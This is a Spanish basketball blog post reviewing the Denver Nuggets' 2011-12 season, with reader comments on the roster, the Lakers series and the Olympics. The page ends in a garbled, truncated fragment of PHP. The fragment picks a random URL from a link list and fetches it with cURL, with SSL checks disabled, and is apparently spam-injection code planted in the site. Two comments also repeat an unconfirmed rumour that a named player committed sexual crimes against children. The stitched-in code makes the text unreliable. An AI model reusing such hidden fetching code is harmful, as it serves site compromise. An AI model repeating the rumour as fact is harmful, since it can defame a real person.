Denver Nuggets: Bien

25 de July de 2012 por TheDeerHunter

Pecamos de un sutil exceso de optimismo en nuestros pronósticos al principio de curso. Dábamos segunda ronda a un grupo sólido, equilibrado, talentoso. La franquicia terminaba de mostrar su ambición afrontando costosas renovaciones de hombres clave como Lawson, Nené o Afflalo. Más tarde harían lo propio con Gallinari.

Sostengo que tenían de todo: Hombres grandes, tiradores, reboteadores, especialistas defensivos, buena mano, intimidadores, juventud, experiencia, inteligencia… Faltaba un líder all-star pero estaban dirigidos desde el banco por un excelente técnico como es George Karl. No se puede tener todo y el modelo “Melo” ya lo tenían recorrido.

Un fabuloso enero parecía confirmar las sensaciones. 12 victorias por 5 derrotas con Lawson asumiendo galones, un Nené sólido, una buena versión de Danilo y desde el banco liándola André Miller, Al Harrington e incluso Rudy. Todavía no habíamos visto ni la punta del iceberg del rookie Kenneth Faried.

Tal y como vino se fue el mojo. Al igual que fueron los Lakers, omnipresentes en la trayectoria de la franquicia la última década, sus primeras víctimas de la mejor racha, serían ellos los que inaugurarían su calvario de febrero. Es el tramo de la temporada donde todo sale mal. Se van lesionando Nené, Gallinari, Rudy, Afflalo, Mozgov… No hay mal que por bien no venga. Supone el nacimiento deportivo de Faried, llamado a ser hombre clave de la franquicia los próximos años.

Marzo no termina de arrancar. La franquicia parece perder la paciencia y da un ¿extraño? giro a los acontecimientos, enviando a Nené a Washington a cambio de una incógnita como McGee. Vuelve Chandler pero su presencia es inapreciable el resto de campaña. El equipo, sin embargo, mantiene el punto de mira en la postemporada y firma la 6ª plaza del oeste, con un balance inferior al de los años anteriores. El equipo más potente ofensivamente pero el segundo más blando en lo defensivo. El rival en los cruces, los Lakers, como siempre.

Apuntaba a paseo amarillo pero para nada. Los Nuggets forzaron hasta el límite a sus rivales. Karl superó ampliamente a Mike Brown. Faried y McGee amargaron más de una noche a las torres angelinas y de no ser por la vuelta de MTW, la irrupción de Blake y la desesperada defensa de Kobe sobre Lawson hubiéramos acertado al 100% en nuestro pronóstico inicial.

Lo mejor: Que a pesar de las idas y venidas hay proyecto para largo. El rookie Kenneth Faried. Ty Lawson en plan pseudo-all star.

Lo peor: La defensa. La salida por la puerta de atrás de Nené pocos meses después de su renovación. El definitivo “fracaso” de Rudy. La defensa de MTW sobre Gallinari.

Jugando a GM:

El equipo está prácticamente hecho y no hay mucho que tocar. Tras la salida del pájaro Andersen y la llegada de Anthony Randolph, cerrando las renovaciones de McGee y André no hace falta plantear ningún movimiento más.

Comenta

12 comentarios a esta entrada

  1. Ru dice:
    #1

    Qué descubrimiento Faried.Al principio no jugaba nada y de repente fue teniendo minutos completando unas hojas de esatdística más que interesantes.La apariencia física,leer un poco en la wiki y darse cuenta que había superado a un mito como Duncan como máximo reboteador histórico de la NCAA y ya es uno de los jugadores favoritos.

    Como dice la canción de Pereza,”tengo de todo,dentro de un orden,pero en el fondo nada que importe” …les sigue faltando esa estrella en el puesto de SF/SG.

      Citar

  2. Sempren dice:
    #2

    Gallinari volvió fatal de su lesión, intentó coger ritmo de juego con minutos pero nunca lo consiguió, y claro, en PO eso se paga todavía más. Creo que con su aportación Denver podría haber derrotado a los Lakers.

    Sin embargo, y pese a que me encanta este equipo, me parece un equipo como los Hawks, un equipo con un techo, que irá progresando, pero que no llegará a luchar por el anillo con esta plantilla.
    Pero oye, que repetir primera ronda todos los años y con el tiempo, mejorar y optar a las finales de conferencia algún año no está nada mal

      Citar

  3. Sancho88 dice:
    #3

    No me ha gustado nada que amnistiasen a alguien como Andersen, que siempre siempre ha rendido y ha cumplido aportando cosas al equipo. Encima para traer a Randolph, uno de los jugadores más irregulares de la liga. El movimiento me parece odioso. Sobre el pronóstico de barrida de Lakers, no todos dijimos que iba a ser un paseo. Yo aposté por el 4-3 desde el primer momento y se puede mirar en el análisis de la eliminatoria. Lakers fuera no ganaba a nadie y era lógico ese resultado. Sobre el liderazgo que le falta al equipo, está claro que Gallo era el crack antes del all star, luego se lesionó y volvió a menos del 50% de su verdadero nivel. Está claro que es un buen jugador, pero dudo mucho que pueda considerarse jugador franquicia, así que Denver quizá debería buscar en algún traspaso con Philly o Atlanta hacerse con Iggy o Josh Smith. Incluso poniendo encima de la mesa el contrato de Gallo

      Citar

  4. melo15 dice:
    #4

    Eso perdieron en el traspaso de Melo, ganaron una plantilla completisima y pero les falta ese jugador que anote este quien este en Playoffs y Melo tenia muchas cosas malas, pero eso lo hacia a la perfeccion.
    Lawson es un buen base pero no un jugador franquicia igual que Faried.
    PD: Aunque los Nuggs ya se estan intentando hacer con gente de teorico potencial como Randolph y Quincy Miller.

      Citar

  5. Nacho dice:
    #5

    Billups
    Hamilton
    Prince
    y los Wallace.

    Lawson
    Chandler
    Gallinari
    Faried
    McGee.

    Dadles un par de años a los chicos y tenemos Detroit a la inversa. Es decir, anotando (y algo tendrán que defender)
    No siempre es necesario un super estrella.

    Por cierto Melo15, ¿qué tal en el Palau? Carmelo se portó contigo anoche, ¿eh?

      Citar

  6. Melo15 dice:
    #6

    Joder, vaya partido, España empezo muy bien con Calde y Ibaka liandola en el P&R pero entonces EEUU se puso a defender a cara de perro y sumado al acierto desde el triple decantaron el partido a su favor.
    Injustisimo el MVP compartido, Lebron hizo un partidazo, pero en la segunda parte cuando las cosas estaban mas decididas, peor fue Melo el que se puso el equipo a las espaldas en la 1parte cuando mas justas estaban las cosas.
    PD: Vaya tapon nos regalo Anthony Davis en los 3 minutos que jugo!

      Citar

  7. Sancho88 dice:
    #7

    Hombre, lo injusto hubiera sido que se lo hubieran dado solo a Carmelo… un partido no dura solo 20 minutos… objetivamente el mejor jugador del partido fue Lebron, aunque Anthony tb la lió parda, y como bien dices tiró del equipo cuando perdían de 10. Para mí el premio compartido fue lo más justo

      Citar

  8. Sancho88 dice:
    #8

    Porque tb los tres triples seguidos de Lebron cuando España estaba apretando a 13 o así, tb tuvieron su mérito no?

      Citar

  9. Pop dice:
    #9

    Y las 8 asistencias (FIBA) que se cascó…

      Citar

  10. Sempren dice:
    #10

    Sancho, Andersen estuvo o está siendo investigado por la policía por asuntos bastante feos si no recuerdo mal, por lo que ya estuvo el final de temporada apartado del equipo (en teoría, de mutuo acuerdo).
    Yo me imagino que es por eso, porque además con la de años que llevaba en el equipo…

      Citar

  11. Esteban dice:
    #11

    sancho, andersen era el unico contrato malo que tenian, asi que decidieron usar la amnistia

    tienen miles de contratos bajos de jugadores jovenes, con tantos valores podrian haber haber ido a por howard y nash y monta ellis y aun quedarse con muchos buenos jugadores

    para mi gusto demasiado, tal es asi que chandler no encontro su sitio, como tampoco rudy en su momento,

      Citar

  12. Sancho88 dice:
    #12

    Hostia, es verdad… que al chico le gustan los párvulos supuestamente… yo tb lo habría amnistiado. En estos casos la NBA debería permitir saltarse ciertas reglas y no tener que pagar ni un céntimo a un tipo así… al fin y al cabo, hay un motivo muy evidente de despido procedente, y eso deberían permitirlo sin contraprestación económica. Para mí, si se confirma, es uno de los delitos más repelentes y repulsivos. Que alguien siga cobrando millones de dólares después de esto… en serio, con tantas horas que echaron en los despachos para resolver el lockout, nadie planteo algún caso especial de amnistía sin contraprestación económica para criminales? Me parece muy fuerte

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>